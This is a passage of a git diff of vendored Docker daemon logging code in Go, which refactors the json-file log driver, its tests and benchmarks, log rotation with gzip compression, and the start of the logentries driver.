a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go @@ -1,6 +1,8 @@ -package jsonfilelog +package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog" import ( + "bytes" + "compress/gzip" "encoding/json" "io/ioutil" "os" @@ -11,7 +13,10 @@ import ( "time" "github.com/docker/docker/daemon/logger" - "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" ) func TestJSONFileLogger(t *testing.T) { @@ -22,7 +27,7 @@ func TestJSONFileLogger(t *testing.T) { } defer os.RemoveAll(tmp) filename := filepath.Join(tmp, "container.log") - l, err := New(logger.Context{ + l, err := New(logger.Info{ ContainerID: cid, LogPath: filename, }) @@ -54,36 +59,78 @@ func TestJSONFileLogger(t *testing.T) { } } -func BenchmarkJSONFileLogger(b *testing.B) { +func TestJSONFileLoggerWithTags(t *testing.T) { cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + cname := "test-container" tmp, err := ioutil.TempDir("", "docker-logger-") - if err != nil { - b.Fatal(err) - } + + assert.NilError(t, err) + defer os.RemoveAll(tmp) filename := filepath.Join(tmp, "container.log") - l, err := New(logger.Context{ - ContainerID: cid, - LogPath: filename, + l, err := New(logger.Info{ + Config: map[string]string{ + "tag": "{{.ID}}/{{.Name}}", // first 12 characters of ContainerID and full ContainerName + }, + ContainerID: cid, + ContainerName: cname, + LogPath: filename, }) - if err != nil { - b.Fatal(err) - } + + assert.NilError(t, err) defer l.Close() - testLine := "Line that thinks that it is log line from docker\n" - msg := &logger.Message{Line: []byte(testLine), Source: "stderr", Timestamp: time.Now().UTC()} - jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON() - if err != nil { - b.Fatal(err) + err = l.Log(&logger.Message{Line: []byte("line1"), Source: "src1"}) + assert.NilError(t, err) + + err = l.Log(&logger.Message{Line: []byte("line2"), Source: "src2"}) + assert.NilError(t, err) + + err = l.Log(&logger.Message{Line: []byte("line3"), Source: "src3"}) + assert.NilError(t, err) + + res, err := ioutil.ReadFile(filename) + assert.NilError(t, err) + + expected := `{"log":"line1\n","stream":"src1","attrs":{"tag":"a7317399f3f8/test-container"},"time":"0001-01-01T00:00:00Z"} +{"log":"line2\n","stream":"src2","attrs":{"tag":"a7317399f3f8/test-container"},"time":"0001-01-01T00:00:00Z"} +{"log":"line3\n","stream":"src3","attrs":{"tag":"a7317399f3f8/test-container"},"time":"0001-01-01T00:00:00Z"} +` + assert.Check(t, is.Equal(expected, string(res))) +} + +func BenchmarkJSONFileLoggerLog(b *testing.B) { + tmp := fs.NewDir(b, "bench-jsonfilelog") + defer tmp.Remove() + + jsonlogger, err := New(logger.Info{ + ContainerID: "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657", + LogPath: tmp.Join("container.log"), + Config: map[string]string{ + "labels": "first,second", + }, + ContainerLabels: map[string]string{ + "first": "label_value", + "second": "label_foo", + }, + }) + assert.NilError(b, err) + defer jsonlogger.Close() + + msg := &logger.Message{ + Line: []byte("Line that thinks that it is log line from docker\n"), + Source: "stderr", + Timestamp: time.Now().UTC(), } - b.SetBytes(int64(len(jsonlog)+1) * 30) + + buf := bytes.NewBuffer(nil) + assert.NilError(b, marshalMessage(msg, nil, buf)) + b.SetBytes(int64(buf.Len())) + b.ResetTimer() for i := 0; i < b.N; i++ { - for j := 0; j < 30; j++ { - if err := l.Log(msg); err != nil { - b.Fatal(err) - } + if err := jsonlogger.Log(msg); err != nil { + b.Fatal(err) } } } @@ -96,8 +143,8 @@ func TestJSONFileLoggerWithOpts(t *testing.T) { } defer os.RemoveAll(tmp) filename := filepath.Join(tmp, "container.log") - config := map[string]string{"max-file": "2", "max-size": "1k"} - l, err := New(logger.Context{ + config := map[string]string{"max-file": "3", "max-size": "1k", "compress": "true"} + l, err := New(logger.Info{ ContainerID: cid, LogPath: filename, Config: config, @@ -106,21 +153,55 @@ func TestJSONFileLoggerWithOpts(t *testing.T) { t.Fatal(err) } defer l.Close() - for i := 0; i < 20; i++ { + for i := 0; i < 36; i++ { if err := l.Log(&logger.Message{Line: []byte("line" + strconv.Itoa(i)), Source: "src1"}); err != nil { t.Fatal(err) } } + res, err := ioutil.ReadFile(filename) if err != nil { t.Fatal(err) } + penUlt, err := ioutil.ReadFile(filename + ".1") + if err != nil { + if !os.IsNotExist(err) { + t.Fatal(err) + } + + file, err := os.Open(filename + ".1.gz") + defer file.Close() + if err != nil { + t.Fatal(err) + } + zipReader, err := gzip.NewReader(file) + defer zipReader.Close() + if err != nil { + t.Fatal(err) + } + penUlt, err = ioutil.ReadAll(zipReader) + if err != nil { + t.Fatal(err) + } + } + + file, err := os.Open(filename + ".2.gz") + defer file.Close() + if err != nil { + t.Fatal(err) + } + zipReader, err := gzip.NewReader(file) + defer zipReader.Close() + if err != nil { + t.Fatal(err) + } + antepenult, err := ioutil.ReadAll(zipReader) if err != nil { t.Fatal(err) } - expectedPenultimate := `{"log":"line0\n","stream":"src1","time":"0001-01-01T00:00:00Z"} + expectedAntepenultimate := `{"log":"line0\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line1\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line2\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line3\n","stream":"src1","time":"0001-01-01T00:00:00Z"} @@ -137,10 +218,27 @@ func TestJSONFileLoggerWithOpts(t *testing.T) { {"log":"line14\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line15\n","stream":"src1","time":"0001-01-01T00:00:00Z"} ` - expected := `{"log":"line16\n","stream":"src1","time":"0001-01-01T00:00:00Z"} + expectedPenultimate := `{"log":"line16\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line17\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line18\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line19\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line20\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line21\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line22\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line23\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line24\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line25\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line26\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line27\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line28\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line29\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line30\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line31\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +` + expected := `{"log":"line32\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line33\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line34\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line35\n","stream":"src1","time":"0001-01-01T00:00:00Z"} ` if string(res) != expected { @@ -149,7 +247,9 @@ func TestJSONFileLoggerWithOpts(t *testing.T) { if string(penUlt) != expectedPenultimate { t.Fatalf("Wrong log content: %q, expected %q", penUlt, expectedPenultimate) } - + if string(antepenult) != expectedAntepenultimate { + t.Fatalf("Wrong log content: %q, expected %q", antepenult, expectedAntepenultimate) + } } func TestJSONFileLoggerWithLabelsEnv(t *testing.T) { @@ -160,13 +260,13 @@ func TestJSONFileLoggerWithLabelsEnv(t *testing.T) { } defer os.RemoveAll(tmp) filename := filepath.Join(tmp, "container.log") - config := map[string]string{"labels": "rack,dc", "env": "environ,debug,ssl"} - l, err := New(logger.Context{ + config := map[string]string{"labels": "rack,dc", "env": "environ,debug,ssl", "env-regex": "^dc"} + l, err := New(logger.Info{ ContainerID: cid, LogPath: filename, Config: config, ContainerLabels: map[string]string{"rack": "101", "dc": "lhr"}, - ContainerEnv: []string{"environ=production", "debug=false", "port=10001", "ssl=true"}, + ContainerEnv: []string{"environ=production", "debug=false", "port=10001", "ssl=true", "dc_region=west"}, }) if err != nil { t.Fatal(err) @@ -189,60 +289,14 @@ func TestJSONFileLoggerWithLabelsEnv(t *testing.T) { t.Fatal(err) } expected := map[string]string{ - "rack": "101", - "dc": "lhr", - "environ": "production", - "debug": "false", - "ssl": "true", + "rack": "101", + "dc": "lhr", + "environ": "production", + "debug": "false", + "ssl": "true", + "dc_region": "west", } if !reflect.DeepEqual(extra, expected) { t.Fatalf("Wrong log attrs: %q, expected %q", extra, expected) } } - -func BenchmarkJSONFileLoggerWithReader(b *testing.B) { - b.StopTimer() - b.ResetTimer() - cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" - dir, err := ioutil.TempDir("", "json-logger-bench") - if err != nil { - b.Fatal(err) - } - defer os.RemoveAll(dir) - - l, err := New(logger.Context{ - ContainerID: cid, - LogPath: filepath.Join(dir, "container.log"), - }) - if err != nil { - b.Fatal(err) - } - defer l.Close() - msg := &logger.Message{Line: []byte("line"), Source: "src1"} - jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON() - if err != nil { - b.Fatal(err) - } - b.SetBytes(int64(len(jsonlog)+1) * 30) - - b.StartTimer() - - go func() { - for i := 0; i < b.N; i++ { - for j := 0; j < 30; j++ { - l.Log(msg) - } - } - l.Close() - }() - - lw := l.(logger.LogReader).ReadLogs(logger.ReadConfig{Follow: true}) - watchClose := lw.WatchClose() - for { - select { - case <-lw.Msg: - case <-watchClose: - return - } - } -} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go new file mode 100644 index 0000000000..74be8e7da0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go @@ -0,0 +1,25 @@ +package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" + +import ( + "time" +) + +// JSONLog is a log message, typically a single entry from a given log stream. +type JSONLog struct { + // Log is the log message + Log string `json:"log,omitempty"` + // Stream is the log source + Stream string `json:"stream,omitempty"` + // Created is the created timestamp of log + Created time.Time `json:"time"` + // Attrs is the list of extra attributes provided by the user + Attrs map[string]string `json:"attrs,omitempty"` +} + +// Reset all fields to their zero value. +func (jl *JSONLog) Reset() { + jl.Log = "" + jl.Stream = "" + jl.Created = time.Time{} + jl.Attrs = make(map[string]string) +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes.go similarity index 76% rename from vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go rename to vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes.go index df522c0d66..577c718f63 100644 --- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes.go @@ -1,25 +1,24 @@ -package jsonlog +package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" import ( "bytes" "encoding/json" + "time" "unicode/utf8" ) -// JSONLogs is based on JSONLog. -// It allows marshalling JSONLog from Log as []byte -// and an already marshalled Created timestamp. +// JSONLogs marshals encoded JSONLog objects type JSONLogs struct { - Log []byte `json:"log,omitempty"` - Stream string `json:"stream,omitempty"` - Created string `json:"time"` + Log []byte `json:"log,omitempty"` + Stream string `json:"stream,omitempty"` + Created time.Time `json:"time"` // json-encoded bytes RawAttrs json.RawMessage `json:"attrs,omitempty"` } -// MarshalJSONBuf is based on the same method from JSONLog -// It has been modified to take into account the necessary changes. +// MarshalJSONBuf is an optimized JSON marshaller that avoids reflection +// and unnecessary allocation. func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error { var first = true @@ -30,13 +29,13 @@ func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error { ffjsonWriteJSONBytesAsString(buf, mj.Log) } if len(mj.Stream) != 0 { - if first == true { + if first { first = false } else { buf.WriteString(`,`) } buf.WriteString(`"stream":`) - ffjsonWriteJSONString(buf, mj.Stream) + ffjsonWriteJSONBytesAsString(buf, []byte(mj.Stream)) } if len(mj.RawAttrs) > 0 { if first { @@ -50,14 +49,18 @@ func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error { if !first { buf.WriteString(`,`) } + + created, err := fastTimeMarshalJSON(mj.Created) + if err != nil { + return err + } + buf.WriteString(`"time":`) - buf.WriteString(mj.Created) + buf.WriteString(created) buf.WriteString(`}`) return nil } -// This is based on ffjsonWriteJSONBytesAsString. It has been changed -// to accept a string passed as a slice of bytes. func ffjsonWriteJSONBytesAsString(buf *bytes.Buffer, s []byte) { const hex = "0123456789abcdef" diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go new file mode 100644 index 0000000000..d268db4df0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go @@ -0,0 +1,51 @@ +package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" + +import ( + "bytes" + "encoding/json" + "fmt" + "regexp" + "testing" + "time" + + "gotest.tools/assert" +) + +func TestJSONLogsMarshalJSONBuf(t *testing.T) { + logs := map[*JSONLogs]string{ + {Log: []byte(`"A log line with \\"`)}: `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":`, + {Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"time\":`, + {Log: []byte("A log line with \r")}: `^{\"log\":\"A log line with \\r\",\"time\":`, + {Log: []byte("A log line with & < >")}: `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":`, + {Log: []byte("A log line with utf8 : 🚀 ψ ω β")}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":`, + {Stream: "stdout"}: `^{\"stream\":\"stdout\",\"time\":`, + {Stream: "stdout", Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"stream\":\"stdout\",\"time\":`, + {Created: time.Date(2017, 9, 1, 1, 1, 1, 1, time.UTC)}: `^{\"time\":"2017-09-01T01:01:01.000000001Z"}$`, + + {}: `^{\"time\":"0001-01-01T00:00:00Z"}$`, + // These ones are a little weird + {Log: []byte("\u2028 \u2029")}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":`, + {Log: []byte{0xaF}}: `^{\"log\":\"\\ufffd\",\"time\":`, + {Log: []byte{0x7F}}: `^{\"log\":\"\x7f\",\"time\":`, + // with raw attributes + {Log: []byte("A log line"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":`, + // with Tag set + {Log: []byte("A log line with tag"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line with tag\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":`, + } + for jsonLog, expression := range logs { + var buf bytes.Buffer + err := jsonLog.MarshalJSONBuf(&buf) + assert.NilError(t, err) + + assert.Assert(t, regexP(buf.String(), expression)) + assert.NilError(t, json.Unmarshal(buf.Bytes(), &map[string]interface{}{})) + } +} + +func regexP(value string, pattern string) func() (bool, string) { + return func() (bool, string) { + re := regexp.MustCompile(pattern) + msg := fmt.Sprintf("%q did not match pattern %q", value, pattern) + return re.MatchString(value), msg + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go new file mode 100644 index 0000000000..1822ea5dbc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go @@ -0,0 +1,20 @@ +package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" + +import ( + "time" + + "github.com/pkg/errors" +) + +const jsonFormat = `"` + time.RFC3339Nano + `"` + +// fastTimeMarshalJSON avoids one of the extra allocations that +// time.MarshalJSON is making. +func fastTimeMarshalJSON(t time.Time) (string, error) { + if y := t.Year(); y < 0 || y >= 10000 { + // RFC 3339 is clear that years are 4 digits exactly. + // See golang.org/issue/4556#c15 for more discussion. + return "", errors.New("time.MarshalJSON: year outside of range [0,9999]") + } + return t.Format(jsonFormat), nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go new file mode 100644 index 0000000000..b3959b0467 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go @@ -0,0 +1,34 @@ +package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" + +import ( + "testing" + "time" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestFastTimeMarshalJSONWithInvalidYear(t *testing.T) { + aTime := time.Date(-1, 1, 1, 0, 0, 0, 0, time.Local) + _, err := fastTimeMarshalJSON(aTime) + assert.Check(t, is.ErrorContains(err, "year outside of range")) + + anotherTime := time.Date(10000, 1, 1, 0, 0, 0, 0, time.Local) + _, err = fastTimeMarshalJSON(anotherTime) + assert.Check(t, is.ErrorContains(err, "year outside of range")) +} + +func TestFastTimeMarshalJSON(t *testing.T) { + aTime := time.Date(2015, 5, 29, 11, 1, 2, 3, time.UTC) + json, err := fastTimeMarshalJSON(aTime) + assert.NilError(t, err) + assert.Check(t, is.Equal("\"2015-05-29T11:01:02.000000003Z\"", json)) + + location, err := time.LoadLocation("Europe/Paris") + assert.NilError(t, err) + + aTime = time.Date(2015, 5, 29, 11, 1, 2, 3, location) + json, err = fastTimeMarshalJSON(aTime) + assert.NilError(t, err) + assert.Check(t, is.Equal("\"2015-05-29T11:01:02.000000003+02:00\"", json)) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go index f2f9df1887..ab1793bb72 100644 --- a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go @@ -1,41 +1,16 @@ -package jsonfilelog +package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog" import ( - "bytes" "encoding/json" - "errors" - "fmt" "io" - "os" - "time" - "github.com/fsnotify/fsnotify" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types/backend" "github.com/docker/docker/daemon/logger" - "github.com/docker/docker/pkg/filenotify" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/jsonlog" - "github.com/docker/docker/pkg/tailfile" + "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" ) const maxJSONDecodeRetry = 20000 -func decodeLogLine(dec *json.Decoder, l *jsonlog.JSONLog) (*logger.Message, error) { - l.Reset() - if err := dec.Decode(l); err != nil { - return nil, err - } - msg := &logger.Message{ - Source: l.Stream, - Timestamp: l.Created, - Line: []byte(l.Log), - Attrs: l.Attrs, - } - return msg, nil -} - // ReadLogs implements the logger's LogReader interface for the logs // created by this driver. func (l *JSONFileLogger) ReadLogs(config logger.ReadConfig) *logger.LogWatcher { @@ -45,275 +20,70 @@ func (l *JSONFileLogger) ReadLogs(config logger.ReadConfig) *logger.LogWatcher { return logWatcher } -func (l *JSONFileLogger) readLogs(logWatcher *logger.LogWatcher, config logger.ReadConfig) { - defer close(logWatcher.Msg) +func (l *JSONFileLogger) readLogs(watcher *logger.LogWatcher, config logger.ReadConfig) { + defer close(watcher.Msg) - // lock so the read stream doesn't get corrupted due to rotations or other log data written while we read - // This will block writes!!! l.mu.Lock() - - pth := l.writer.LogPath() - var files []io.ReadSeeker - for i := l.writer.MaxFiles(); i > 1; i-- { - f, err := os.Open(fmt.Sprintf("%s.%d", pth, i-1)) - if err != nil { - if !os.IsNotExist(err) { - logWatcher.Err <- err - break - } - continue - } - defer f.Close() - - files = append(files, f) - } - - latestFile, err := os.Open(pth) - if err != nil { - logWatcher.Err <- err - l.mu.Unlock() - return - } - defer latestFile.Close() - - if config.Tail != 0 { - tailer := ioutils.MultiReadSeeker(append(files, latestFile)...) - tailFile(tailer, logWatcher, config.Tail, config.Since) - } - - // close all the rotated files - for _, f := range files { - if err := f.(io.Closer).Close(); err != nil { - logrus.WithField("logger", "json-file").Warnf("error closing tailed log file: %v", err) - } - } - - if !config.Follow { - if err := latestFile.Close(); err != nil { - logrus.Errorf("Error closing file: %v", err) - } - l.mu.Unlock() - return - } - - if config.Tail >= 0 { - latestFile.Seek(0, os.SEEK_END) - } - - l.readers[logWatcher] = struct{}{} + l.readers[watcher] = struct{}{} l.mu.Unlock() - notifyRotate := l.writer.NotifyRotate() - followLogs(latestFile, logWatcher, notifyRotate, config.Since) + l.writer.ReadLogs(config, watcher) l.mu.Lock() - delete(l.readers, logWatcher) + delete(l.readers, watcher) l.mu.Unlock() - - l.writer.NotifyRotateEvict(notifyRotate) } -func tailFile(f io.ReadSeeker, logWatcher *logger.LogWatcher, tail int, since time.Time) { - var rdr io.Reader - rdr = f - if tail > 0 { - ls, err := tailfile.TailFile(f, tail) - if err != nil { - logWatcher.Err <- err - return - } - rdr = bytes.NewBuffer(bytes.Join(ls, []byte("\n"))) - } - dec := json.NewDecoder(rdr) - l := &jsonlog.JSONLog{} - for { - msg, err := decodeLogLine(dec, l) - if err != nil { - if err != io.EOF { - logWatcher.Err <- err - } - return - } - if !since.IsZero() && msg.Timestamp.Before(since) { - continue - } - logWatcher.Msg <- msg - } -} - -func watchFile(name string) (filenotify.FileWatcher, error) { - fileWatcher, err := filenotify.New() - if err != nil { +func decodeLogLine(dec *json.Decoder, l *jsonlog.JSONLog) (*logger.Message, error) { + l.Reset() + if err := dec.Decode(l); err != nil { return nil, err } - if err := fileWatcher.Add(name); err != nil { - logrus.WithField("logger", "json-file").Warnf("falling back to file poller due to error: %v", err) - fileWatcher.Close() - fileWatcher = filenotify.NewPollingWatcher() - - if err := fileWatcher.Add(name); err != nil { - fileWatcher.Close() - logrus.Debugf("error watching log file for modifications: %v", err) - return nil, err + var attrs []backend.LogAttr + if len(l.Attrs) != 0 { + attrs = make([]backend.LogAttr, 0, len(l.Attrs)) + for k, v := range l.Attrs { + attrs = append(attrs, backend.LogAttr{Key: k, Value: v}) } } - return fileWatcher, nil + msg := &logger.Message{ + Source: l.Stream, + Timestamp: l.Created, + Line: []byte(l.Log), + Attrs: attrs, + } + return msg, nil } -func followLogs(f *os.File, logWatcher *logger.LogWatcher, notifyRotate chan interface{}, since time.Time) { - dec := json.NewDecoder(f) +// decodeFunc is used to create a decoder for the log file reader +func decodeFunc(rdr io.Reader) func() (*logger.Message, error) { l := &jsonlog.JSONLog{} - - name := f.Name() - fileWatcher, err := watchFile(name) - if err != nil { - logWatcher.Err <- err - return - } - defer func() { - f.Close() - fileWatcher.Remove(name) - fileWatcher.Close() - }() - - ctx, cancel := context.WithCancel(context.Background()) - defer cancel() - go func() { - select { - case <-logWatcher.WatchClose(): - fileWatcher.Remove(name) - cancel() - case <-ctx.Done(): - return - } - }() - - var retries int - handleRotate := func() error { - f.Close() - fileWatcher.Remove(name) - - // retry when the file doesn't exist - for retries := 0; retries <= 5; retries++ { - f, err = os.Open(name) - if err == nil || !os.IsNotExist(err) { + dec := json.NewDecoder(rdr) + return func() (msg *logger.Message, err error) { + for retries := 0; retries < maxJSONDecodeRetry; retries++ { + msg, err = decodeLogLine(dec, l) + if err == nil { break } - } - if err != nil { - return err - } - if err := fileWatcher.Add(name); err != nil { - return err - } - dec = json.NewDecoder(f) - return nil - } - errRetry := errors.New("retry") - errDone := errors.New("done") - waitRead := func() error { - select { - case e := <-fileWatcher.Events(): - switch e.Op { - case fsnotify.Write: - dec = json.NewDecoder(f) - return nil - case fsnotify.Rename, fsnotify.Remove: - select { - case <-notifyRotate: - case <-ctx.Done(): - return errDone - } - if err := handleRotate(); err != nil { - return err - } - return nil - } - return errRetry - case err := <-fileWatcher.Errors(): - logrus.Debug("logger got error watching file: %v", err) - // Something happened, let's try and stay alive and create a new watcher - if retries <= 5 { - fileWatcher.Close() - fileWatcher, err = watchFile(name) - if err != nil { - return err - } + // try again, could be due to a an incomplete json object as we read + if _, ok := err.(*json.SyntaxError); ok { + dec = json.NewDecoder(rdr) retries++ - return errRetry + continue } - return err - case <-ctx.Done(): - return errDone - } - } - handleDecodeErr := func(err error) error { - if err == io.EOF { - for err := waitRead(); err != nil; { - if err == errRetry { - // retry the waitRead - continue - } - return err - } - return nil - } - // try again because this shouldn't happen - if _, ok := err.(*json.SyntaxError); ok && retries <= maxJSONDecodeRetry { - dec = json.NewDecoder(f) - retries++ - return nil - } - // io.ErrUnexpectedEOF is returned from json.Decoder when there is - // remaining data in the parser's buffer while an io.EOF occurs. - // If the json logger writes a partial json log entry to the disk - // while at the same time the decoder tries to decode it, the race condition happens. - if err == io.ErrUnexpectedEOF && retries <= maxJSONDecodeRetry { - reader := io.MultiReader(dec.Buffered(), f) - dec = json.NewDecoder(reader) - retries++ - return nil - } - return err - } - - // main loop - for { - msg, err := decodeLogLine(dec, l) - if err != nil { - if err := handleDecodeErr(err); err != nil { - if err == errDone { - return - } - // we got an unrecoverable error, so return - logWatcher.Err <- err - return - } - // ready to try again - continue - } - - retries = 0 // reset retries since we've succeeded - if !since.IsZero() && msg.Timestamp.Before(since) { - continue - } - select { - case logWatcher.Msg <- msg: - case <-ctx.Done(): - logWatcher.Msg <- msg - for { - msg, err := decodeLogLine(dec, l) - if err != nil { - return - } - if !since.IsZero() && msg.Timestamp.Before(since) { - continue - } - logWatcher.Msg <- msg + // io.ErrUnexpectedEOF is returned from json.Decoder when there is + // remaining data in the parser's buffer while an io.EOF occurs. + // If the json logger writes a partial json log entry to the disk + // while at the same time the decoder tries to decode it, the race condition happens. + if err == io.ErrUnexpectedEOF { + reader := io.MultiReader(dec.Buffered(), rdr) + dec = json.NewDecoder(reader) + retries++ } } + return msg, err } } diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go new file mode 100644 index 0000000000..cad8003e5e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go @@ -0,0 +1,64 @@ +package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog" + +import ( + "bytes" + "testing" + "time" + + "github.com/docker/docker/daemon/logger" + "gotest.tools/assert" + "gotest.tools/fs" +) + +func BenchmarkJSONFileLoggerReadLogs(b *testing.B) { + tmp := fs.NewDir(b, "bench-jsonfilelog") + defer tmp.Remove() + + jsonlogger, err := New(logger.Info{ + ContainerID: "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657", + LogPath: tmp.Join("container.log"), + Config: map[string]string{ + "labels": "first,second", + }, + ContainerLabels: map[string]string{ + "first": "label_value", + "second": "label_foo", + }, + }) + assert.NilError(b, err) + defer jsonlogger.Close() + + msg := &logger.Message{ + Line: []byte("Line that thinks that it is log line from docker\n"), + Source: "stderr", + Timestamp: time.Now().UTC(), + } + + buf := bytes.NewBuffer(nil) + assert.NilError(b, marshalMessage(msg, nil, buf)) + b.SetBytes(int64(buf.Len())) + + b.ResetTimer() + + chError := make(chan error, b.N+1) + go func() { + for i := 0; i < b.N; i++ { + chError <- jsonlogger.Log(msg) + } + chError <- jsonlogger.Close() + }() + + lw := jsonlogger.(*JSONFileLogger).ReadLogs(logger.ReadConfig{Follow: true}) + watchClose := lw.WatchClose() + for { + select { + case <-lw.Msg: + case <-watchClose: + return + case err := <-chError: + if err != nil { + b.Fatal(err) + } + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go index e794b1ed08..70a8baf66e 100644 --- a/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go +++ b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go @@ -1,13 +1,15 @@ // Package logentries provides the log driver for forwarding server logs // to logentries endpoints. -package logentries +package logentries // import "github.com/docker/docker/daemon/logger/logentries" import ( "fmt" + "strconv" - "github.com/Sirupsen/logrus" "github.com/bsphere/le_go" "github.com/docker/docker/daemon/logger" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) type logentries struct { @@ -16,11 +18,13 @@ type logentries struct { containerName string writer *le_go.Logger extra map[string]string + lineOnly bool } const ( - name = "logentries" - token = "logentries-token" + name = "logentries" + token = "logentries-token" + lineonly = "line-only" ) func init() { @@ -35,33 +39,49 @@ func init() { // New creates a logentries logger using the configuration passed in on // the context. The supported context configuration variable is // logentries-token. -func New(ctx logger.Context) (logger.Logger, error) { - logrus.WithField("container", ctx.ContainerID). - WithField("token", ctx.Config[token]). +func New(info logger.Info) (logger.Logger, error) { + logrus.WithField("container", info.ContainerID). + WithField("token", info.Config[token]). + WithField("line-only", 